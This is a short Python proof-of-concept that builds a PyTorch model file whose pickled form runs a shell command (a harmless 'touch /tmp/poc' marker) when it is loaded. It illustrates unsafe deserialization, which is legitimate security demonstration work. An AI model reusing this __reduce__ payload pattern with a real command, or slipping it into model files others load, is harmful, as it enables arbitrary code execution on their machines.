import torch
import os
class OverwriteFile(torch.nn.Module):
    """Proof-of-concept module whose pickled form carries a shell command.

    Illustrates why pickle-based model files from untrusted sources should
    not be fully unpickled: instead of describing how to rebuild a module,
    this class instructs the unpickler to call ``os.system``.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle stores for this object.

        During unpickling, pickle invokes ``callable(*args)``, so loading the
        serialized object runs ``os.system("touch /tmp/poc")``. The command
        only creates (or updates the timestamp of) ``/tmp/poc`` as a marker
        that execution took place.
        """
        # This payload causes os.system to run the command when deserialized.
        return (os.system, ("touch /tmp/poc",))
# Instantiate the proof-of-concept module and serialize it to disk; the
# written file carries the object's __reduce__ payload.
malicious_model = OverwriteFile()
torch.save(obj=malicious_model, f="malicious_model.pth")